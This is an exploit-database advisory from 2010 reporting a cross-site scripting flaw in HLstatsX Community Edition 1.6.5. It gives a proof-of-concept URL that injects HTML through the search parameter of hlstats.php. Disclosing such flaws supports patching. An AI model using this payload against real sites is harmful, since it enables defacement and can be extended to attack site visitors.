HLstatsX Community Edition 1.6.5 Cross Site Scripting Vulnerability

2010-01-02T00:00:00
ID 1337DAY-ID-10572
Type zdt
Reporter Sora
Modified 2010-01-02T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
HLstatsX Community Edition 1.6.5 Cross Site Scripting Vulnerability
===================================================================

# Exploit Title: HLstatsX Community Edition 1.6.5 Cross Site Scripting Vulnerability
# Date: January 1st, 2010
# Author: Sora
# Version: 1.6.5 and lower versions
# Tested on: Windows Vista
 
-------------------------------------------
> HLstatsX CE 1.6.5 XSS Vulnerability
> Author: Sora
# DESCRIPTION:
HLstatsX Community Edition suffers from a XSS vulnerability.
 
# PoC:
http://www.example.com/hlstatsx/hlstats.php?mode=search&q=%3CH1%3EHacked by Sora%3C%2FH1%3E&st=player&game=l4d



#  0day.today [2018-02-06]  #